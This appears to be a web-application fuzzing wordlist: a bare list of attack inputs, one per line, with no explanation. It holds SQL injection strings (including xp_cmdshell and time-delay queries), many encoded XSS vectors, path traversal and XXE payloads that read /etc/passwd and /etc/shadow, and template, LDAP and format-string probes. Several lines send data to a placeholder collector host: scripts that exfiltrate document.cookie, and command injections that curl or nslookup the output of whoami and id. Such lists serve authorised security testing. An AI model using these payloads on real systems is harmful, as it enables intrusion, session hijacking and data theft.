 ;
 '
 "
 "/><script>alert(1)</script>
 \n
 &
 &&
 `
 |
 ||
 0x0a
 a"/><script>document.location='http://OASTIFY.XXX/?cookiestealer='+document.cookie;</script>
 or 0=0 #"
 or 1=1 or ""=
 or a = a
 or a=a
 or isNULL(1/0) /*
__schema
-
--
--';
--sp_password
-1
-1.0
-2
-20
-268435455
,@variable
;
; or '1'='1'
; ping 127.0.0.1 ;
;echo 111111
;SELECT CASE WHEN (1=1) THEN pg_sleep(7) ELSE pg_sleep(0) END--
:response.write 111111
!
!'
!@#$%%^#$%#$@#$%$$@#$%^^**(()
!@#0%^#0##018387@#0^^**(()
?
?*
?callback=setCountryCookie&utm_content=fuzzer;callback=EVILFunction
?cb=123
?search=%22%3E%3Cbody%20onpopstate=print()>
?x=
?x="
?x=>
?x=|
?x=y
.
....//....//....//....//etc/hostname
../
../../../../../../../../../../../../boot.ini
../../../../../../../../../../../../boot.ini%00
../../../../../../../../../../../../localstart.asp
../../../../../../../../../../../../localstart.asp%00
../../../../../../../../../../boot.ini
../../../../../../../../../../etc/hostname
../../../../../../../../../../windows/win.ini
../../../../../../../../conf/server.xml
../../../../../../../dev/null
../../../etc/passwd%00.png
../../boot.ini
..\
..\..\..\..\..\..\..\..\..\..\boot.ini
..\..\..\..\..\..\..\..\..\..\boot.ini%00
..\..\..\..\..\..\..\..\..\..\windows\win.ini
..\..\..\windows\win.ini
..%%35%63
..%%35c
..%25%35%63
..%252f..%252f..%252fetc/passwd
..%255c
..%5c
..%bg%qf
..%c0%af
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
..%u2215
..%u2216
.%E2%73%70
'
' --
' -- 
' -- &password=
' ;
' (select top 1
' || '1'=='1
' || this || '1'=='1
' || this.version || '1'=='1
' AND '1'='1
' AND '1'='2
' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>1)='a
' and 1 in (select var from temp)--
' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));
' and count(/@*)=1 and '1'='1
' and count(/*)=1 and '1'='1
' and count(/comment())=1 and '1'='1
' function(){ return this.username} or '1'='1
' group by userid having 1=1--
' having 1=1--
' or ''='
' or '1'='1
' or '1'='1'--
' or '7659'='7659
' or 'a'='a
' or 'something' = 'some'+'thing'
' or 'something' like 'some%'
' or 'text' = n'text'
' or 'text' > 't'
' or 'unusual' = 'unusual'
' or 'whatever' in ('whatever')
' or 'x'='x
' or (EXISTS)
' or 0=0 --
' or 0=0 #
' or 1 --'
' or 1 in (@@version)--
' or 1 in (select @@version)--
' or 1/*
' or 1=1
‘ or 1=1 --
' or 1=1 /*
' or 1=1 or ''='
' or 1=1--
' or 1=1-- 
' or 2 > 1
' or 2 between 1 and 3
' or 3=3
‘ or 3=3 --
' or a=a--
' or uid like '%
' or uname like '%
' or user like '%
' or userid like '%
' or username like '%
' or username like char(37);
' select * from information_schema.tables--
' select name from syscolumns where id = (select id from sysobjects where name = tablename')--
' UNION ALL SELECT
' union all select @@version--
' UNION SELECT
' union select 
' union select * from users where login = char(114,111,111,116);
' union select 1,load_file('/etc/passwd'),1,1,1;
'--
';
'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login > 
'; exec ('sel' + 'ect us' + 'er')
'; exec master..xp_cmdshell
'; exec master..xp_cmdshell 'ping 172.10.1.255'--
'; exec xp_regread
'; execute immediate 'sel' || 'ect us' || 'er'
'; waitfor delay '0:30:0'--
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//></SCRIPT>!--<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
';shutdown--
''
''-
'';!--"<XSS>=&{()}
'"><svg/onload=fetch(`//OASTIFY.XXX/${encodeURIComponent(document.cookie)}`)>:CURRENT-USER-LOGIN-COOKIE-2ND-PART
') or ('a'='a
') or ('x'='x
')%20or%20('x'='x
'/**/or/**/1/**/=/**/1
'%20or%20''='
'%20or%20'x'='x
'%20or%201=1
'%3BSELECT+CASE+WHEN+(1=1)+THEN+pg_sleep(7)+ELSE+pg_sleep(0)+END--
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E
'+sqlvuln
'+UNION+SELECT+table_name,NULL+FROM+all_tables--
'><script>alert(document.cookie);</script>
'><script>alert(document.cookie)</script>
'||'6
'||(elt(-3+5,bin(15),ord(10),hex(char(45))))
'||UTL_HTTP.REQUEST
'||Utl_Http.request('http://<yourservername>') from dual--
'hi' or 'x'='x';
'or select *
'sqlattempt1
'sqlvuln
"
" function(){ return this} or '1'='1
" or "a"="a
" or "x"="x
" or 0=0 --
" or 0=0 #
" or 1=1 or ""="
" or 1=1--
" or isNULL(1/0) /*
"__proto__": {"foo":"bar"}
"' or 1 --'"
""
") or ("a"="a
"\t"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////dev/random"">]><foo>&xxe;</foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////etc/passwd"">]><foo>&xxe;</foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////etc/shadow"">]><foo>&xxe;</foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file://c:/boot.ini"">]><foo>&xxe;</foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><foo><![CDATA[' or 1=1 or ''=']]></foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>"
"<HTML xmlns:xss><?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""><xss:xss>XSS</xss:xss></HTML>"
"<xml ID=""xss""><I><B><IMG SRC=""javas<!-- -->cript:alert('XSS')""></B></I></xml><SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
"<xml ID=I><X><C><![CDATA[<IMG SRC=""javas]]><![CDATA[cript:alert('XSS');"">]]>"
"<xml SRC=""xsstest.xml"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
"><script>"
"><script>alert(1)</script>
"><script>document.location='http://your.site.com/cgi-bin/cookie.cgi?'+document.cookie</script>
"><svg><animatetransform onbegin=alert(1)>
">xxx<P>yyy
"a"" or 1=1--"
"a"" or 3=3--"
"hi"") or (""a""=""a"
(
(')
(||6)
(sqlattempt2)
(sqlvuln)
)
) or (a=a
) union select * from information_schema.tables;
))))))))))
[']
[&apos;]
{'}
{"data": {"__typename": "query"}}
{{$on.constructor('alert(1)')()}}
{{7*7}}
{{fuzzer}}
{&apos;}
{% debug %}
}
}"-prompt(69)-"fuzzer
}}
}}{{7*7}} 
@'
@*
@&apos;
@var select @var as var into temp end --
@variable
*
*'
*(|(mail=*))
*(|(objectclass=*))
*/*
*&apos;
*|
/
/,%ENV,/
/?search=test%0d%0aSet-Cookie:%20csrfKey=CurrentUserCSRFKEY%3b%20SameSite=None
/?x=%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E
/.../.../.../.../.../
/../../../../../../../../../../../boot.ini
/../../../../../../../../../../../boot.ini%00
/../../../../../../../../../../../boot.ini%00.html
/../../../../../../../../../../../boot.ini%00.jpg
/../../../../../../../../%2A
/..\../..\../..\../..\../..\../..\../boot.ini
/./././././././././././boot.ini
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini
/'
//
//*
/&apos;
/%00/
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini
/%2A
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini
/admin
/api?query=query+IntrospectionQuery+%7B%0D%0A++__schema+%7B%0D%0A++++queryType+%7B%0D%0A++++++name%0D%0A++++%7D%0D%0A++++mutationType+%7B%0D%0A++++++name%0D%0A++++%7D%0D%0A++++subscriptionType+%7B%0D%0A++++++name%0D%0A++++%7D%0D%0A++++types+%7B%0D%0A++++++...FullType%0D%0A++++%7D%0D%0A++++directives+%7B%0D%0A++++++name%0D%0A++++++description%0D%0A++++++args+%7B%0D%0A++++++++...InputValue%0D%0A++++++%7D%0D%0A++++%7D%0D%0A++%7D%0D%0A%7D%0D%0A%0D%0Afragment+FullType+on+__Type+%7B%0D%0A++kind%0D%0A++name%0D%0A++description%0D%0A++fields%28includeDeprecated%3A+true%29+%7B%0D%0A++++name%0D%0A++++description%0D%0A++++args+%7B%0D%0A++++++...InputValue%0D%0A++++%7D%0D%0A++++type+%7B%0D%0A++++++...TypeRef%0D%0A++++%7D%0D%0A++++isDeprecated%0D%0A++++deprecationReason%0D%0A++%7D%0D%0A++inputFields+%7B%0D%0A++++...InputValue%0D%0A++%7D%0D%0A++interfaces+%7B%0D%0A++++...TypeRef%0D%0A++%7D%0D%0A++enumValues%28includeDeprecated%3A+true%29+%7B%0D%0A++++name%0D%0A++++description%0D%0A++++isDeprecated%0D%0A++++deprecationReason%0D%0A++%7D%0D%0A++possibleTypes+%7B%0D%0A++++...TypeRef%0D%0A++%7D%0D%0A%7D%0D%0A%0D%0Afragment+InputValue+on+__InputValue+%7B%0D%0A++name%0D%0A++description%0D%0A++type+%7B%0D%0A++++...TypeRef%0D%0A++%7D%0D%0A++defaultValue%0D%0A%7D%0D%0A%0D%0Afragment+TypeRef+on+__Type+%7B%0D%0A++kind%0D%0A++name%0D%0A++ofType+%7B%0D%0A++++kind%0D%0A++++name%0D%0A++++ofType+%7B%0D%0A++++++kind%0D%0A++++++name%0D%0A++++++ofType+%7B%0D%0A++++++++kind%0D%0A++++++++name%0D%0A++++++%7D%0D%0A++++%7D%0D%0A++%7D%0D%0A%7D%0D%0A
/boot.ini
/etc/hostname
/etc/passwd
/fuzzer
/portal
/product?productId=1&storeId=fuzzer"></select>fuzzer
/secrets
/var/www/images/../../../etc/passwd
\
\..\..\..\..\..\..\..\..\..\..\boot.ini
\'
\'-alert(1)//  
\';document.location=`https://OASTIFY.XXX/?BackTicks=`+document.cookie;//
\";alert('XSS');//
\"blah
\\
\\/
\\\\?\\
\\\\*
\&apos;
\0
\0\0
\0\0\0
\00
\00\00
\00\00\00
\nnetstat -a%\n
\t
\u003c
\u003C
\x23
\x27
\x27\x4F\x52 SELECT *
\x27\x6F\x72 SELECT *
\x27UNION SELECT
\x3c
\x3C
\x3D \x27
\x3D \x3B'
&
& ping -i 30 127.0.0.1 &
& ping -n 30 127.0.0.1 &
&#0000060
&#0000060;
&#000060
&#000060;
&#00060
&#00060;
&#0060
&#0060;
&#060
&#060;
&#10;
&#10;&#13;
&#13;
&#13;&#10;
&#60
&#60;
&#x000003c
&#x000003C
&#X000003c
&#X000003C
&#x000003c;
&#x000003C;
&#X000003c;
&#X000003C;
&#x00003c
&#x00003C
&#X00003c
&#X00003C
&#x00003c;
&#x00003C;
&#X00003c;
&#X00003C;
&#x0003c
&#x0003C
&#X0003c
&#X0003C
&#x0003c;
&#x0003C;
&#X0003c;
&#X0003C;
&#x003c
&#x003C
&#X003c
&#X003C
&#x003c;
&#x003C;
&#X003c;
&#X003C;
&#x03c
&#x03C
&#X03c
&#X03C
&#x03c;
&#x03C;
&#X03c;
&#X03C;
&#x3c
&#x3C
&#X3c
&#X3C
&#x3c;
&#x3C;
&#X3c;
&#X3C;
&apos;
&apos;%20OR
&lt
&LT
&lt;
&LT;
&lt;!--#exec%20cmd=&quot;dir&quot;--&gt;
&lt;&gt;&quot;'%;)(&amp;+
&ltscript&gtalert(document.cookie);&ltscript&gtalert
&ltscript&gtalert(document.cookie);</script>
&quot;;id&quot;
&x=y#
#
# a wide sample of malicious input for windows targets
# known cross platform source Code, file disclosure attack patterns - append after file or dir path
#__proto__[hitCallback]=alert%28document.cookie%29
#'
#{7*7}
#&apos;
#x=y&
#xA
#xA#xD
#xD
#xD#xA
%
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%
%00
%00/
%01%02%03%04%0a%0d%0aADSF
%08x
%0a
%0a ping -i 30 127.0.0.1 %0a
%0aDATA%0afoo%0a%2e%0aMAIL+FROM:+<youremail>%0aRCPT+TO:+<youremail>%0aDATA%0aFrom:+<youremail>%0aTo:+<youremail>%0aSubject:+tst%0afoo%0a%2e%0a
%0d
%0d%0a
%0d%0aDATA%0d%0afoo%0d%0a%2e%0d%0aMAIL+FROM:+<youremail>%0d%0aRCPT+TO:+<youremail>%0d%0aDATA%0d%0aFrom:+<youremail>%0d%0aTo:+<youremail>%0d%0aSubject:+test%0d%0afoo%0d%0a%2e%0d%0a
%0d%0aX-Injection-Header:%20AttackValue
%20
%20'sleep%2050'
%20|
%20$(sleep%2050)
%20d
%20n
%20or%20x=x
%20s
%20x
%21
%22%3E%3Cbody%20onpopstate=print()%3E">
%22%3E%3Cbody%20onresize=print()%3E" onload=this.style.width='100px'>
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%		25%5c..%25%5c..%255cboot.ini
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%	25%5c..%25%5c..%00
%2500
%250a
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fhostname
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E
%2561
%26
%26entity;
%26x=y
%27%20or%201=1
%28
%29
%2A
%2A%28%7C%28mail%3D%2A%29%29
%2A%28%7C%28objectclass%3D%2A%29%29
%2A%7C
%2C
%2e
%2e%2e%2f
%2e0
%2f
%3C
%3C%3F
%3cscript%3ealert("XSS");%3c/script%3e
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E
%3cscript%3ealert(document.cookie);%3c%2fscript%3e
%3Cscript%3Ealert%28%27reflectXSS%27%29%3C%2Fscript%3E
%3Cscript%3Ealert%28%27reflectXSS%27%29%3C%2Fscript%3E&password=pass
%5c
%5C
%5C/
%60
%70
%7C
%7f
%99999999999s
%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a
%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A
%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d
%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d 
%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e
%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E
%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f
%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F
%ff
%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g
%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G
%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i
%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o
%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p
%s%p%x%d
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X
`
`dir`
`perl -e 'print ".%p" x 80'`%n
`ping 127.0.0.1`
^'
^&apos;
+
+%00
<
<  script > < / script>
<!
<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
<![CDATA[<script>var n=0;while(true){n++;}</script>]]>
<?
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////dev/random">]><foo>&xxe;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////etc/passwd">]><foo>&xxe;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////etc/shadow">]><foo>&xxe;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xxe;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foo>
<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
</foo>
<%= 7*7 %>
<<
<<<
<<script>alert("XSS");//<</script>
<>"'%;)(&+
<>\'\"<script>{{7*7}}
<>\'\"<script>{{7*7}}$(alert(1)}"-prompt(69)-"fuzzer
<a href="javascript:&bsol;u0061lert(1)">Click me</a>
<base href="https://OASTIFY.XXX">
<div><p>ReportFuzzer<img src="https://OASTIFY.XXX/fuzz.png"></p>
<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/hostname"/></foo>
<foo+xmlns%3axi%3d"http%3a//www.w3.org/2001/XInclude"><xi%3ainclude+parse%3d"text"+href%3d"file%3a///etc/hostname"/></foo>
<foo></foo>
<HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML>
<iframe src="https://OASTIFY.XXX/" onload="this.contentWindow.postMessage('<img src=1 onerror=fetch(`https://OASTIFY.XXX?collector=`+btoa(document.cookie))>','*')">
<iframe src="https://OASTIFY.XXX/oauth-linking?code=STOLEN-CODE"></iframe>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<IMG SRC=" &#14;  javascript:alert('XSS');">
<img src="https://OASTIFY.XXX/img">
<IMG SRC="jav	ascript:alert('XSS');">
<IMG SRC="jav&#x09;ascript:alert('XSS');">
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
<IMG SRC="javascript:alert('XSS');">
<IMG SRC="javascript:alert('XSS')"
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<IMG SRC=`javascript:alert("'XSS'")`>
<img src=1 onerror=alert(1)>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<img src=x onerror="&#x61;lert(1)">
<IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'>
<IMG%20SRC='javasc	ript:alert(document.cookie)'>
<IMG%20SRC='javascript:alert(document.cookie)'>
<name>','')); phpinfo(); exit;/*</name>
<script src="https://OASTIFY.XXX/script"></script>
<script>alert("XSS")</script>
<script>alert(document.cookie)</script>
<video src="https://OASTIFY.XXX/video"></video>
<xml ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:alert('XSS')"&gt;</B></I></xml><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<xml ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
<xml SRC="xsstest.xml" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<xss><script>alert('XSS')</script></vulnerable>
<xxx>1 UNION SELECT NULL</xxx>
<youremail>%0aBcc:<youremail>
<youremail>%0aCc:<youremail>
<youremail>%0d%0aBcc:<youremail>
<youremail>%0d%0aCc:<youremail>
=
= --
= ;
= '
>
|
| ping -i 30 127.0.0.1 |
| ping -n 30 127.0.0.1 |
|/bin/ls -al
||
|| ping -i 30 127.0.0.1 ; x || ping -n 30 127.0.0.1 &
||6
||cat+/etc/hosts>>/var/www/images/output.txt||
||curl OASTIFY.XXX||
||curl+`id`.OASTIFY.XXX||
||curl+`whoami`.OASTIFY.XXX||
||echo>>output.txt||
||ls+-al>>/var/www/images/output.txt||
||nslookup+`id`.OASTIFY.XXX||
||nslookup+`whoami`.OASTIFY.XXX||
||pwd>output.txt||
||whoami>>/var/www/images/output.txt||
|dir
|dir|
$(alert(1)}"-prompt(69)-"fuzzer
${{<%[%'"}}%\.,
${{7*7}}
${{fuzzer}}
${7*7}
${alert(document.cookie)}
${foobar}
${fuzzer}
$null
$NULL
0
0 or 1=1
00
017700000001
031003000270000
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A
0x77616974666F722064656C61792027303A303A31302700 exec(@s)
0xfffffff
1
1 or 1 in (@@version)--
1 or 1=1
1 or 1=1--
1 waitfor delay '0:0:10'--
1; waitfor delay '0:30:0'--
1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;
1;SELECT%20*
1.0
1||Utl_Http.request('http://<yourservername>') from dual--
100
127.0.0.1
127.1
2
2130706433
2147483647
23 OR 1=1
268435455
65536
69
7
7*7
99
A
a'
a' or 'a' = 'a
a' or 1=1--
a' or 3=3--
a' waitfor delay '0:0:10'--
ABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|
admin' or '
admin'--
alert(document.getElementsByClassName("navbar-brand")[0].innerText)
anything' OR 'x'='x
as
asc
bfilename
C:/boot.ini
C:/inetpub/wwwroot/global.asa
C:\boot.ini
C:\inetpub\wwwroot\global.asa
cachebuster=123456789
CHAR(83)+CHAR(69)+CHAR(76)+CHAR(69)+CHAR(67)+CHAR(84)
char%4039%41%2b%40SELECT
count(/child::node())
declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)
declare @q nvarchar (4000) select @q =
declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e
declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s) 
declare @s varchar(22) select @s =
delete
desc
dir%00
dir%00|
distinct
document.location='https://OASTIFY.XXX/?CacheCookies='+document.cookie;
echo 111111
exec sp
exec xp
exec(@s)
FALSE
function(){ return this.userid}
function(){return version()}
function(){return version}
fuzzer"></select>fuzzer
fuzzer\';alert(`backtick typographical`);//
fuzzer\';console.log(12345);//  
fuzzer%20this%20product%20is%20out%20of%20 --os-cmd "cat /etc/proc"
fuzzer${{<%[%'"}}%\,<>
fuzzer${{<%[%'"}}%\<>
hacker@exploit
hacker@exploit.
hacker@exploit.com
handler
having
hi or 1=1 --"
hi or a=a
hi' or 'a'='a
hi' or 1=1 --
hi') or ('a'='a
hi" or "a"="a
hi" or 1=1 --
hi") or ("a"="a
http://<yourservername>/
insert
like
limit
null
NULL
or
or 0=0 --
or 0=0 #
or 1=1
or 1=1--
or%201=1
or%201=1 --
order by
other
password:*/=1--
PRINT
PRINT @@variable
procedure
replace
response.write 111111
select
something%00html
sqlvuln;
t'; return this; var d='!
t'exec master..xp_cmdshell 'nslookup www.google.com'--
t"; return this; var d='!
to_timestamp_tz
TRUE
truncate
tz_offset
uni/**/on sel/**/ect
update
x' AND 1=(SELECT COUNT(*) FROM tabname); --
x' AND email IS NULL; --
x' AND members.email IS NULL; --
x' AND userid IS NULL; --
x' or 1=1 or 'x'='y
x' OR full_name LIKE '%Bob%
x' or name()='username' or 'x'='y
xsstest
xsstest%00"<>'
XXXXX.%p
XXXXX`perl -e 'print ".%p" x 80'`
ý or 1=1 --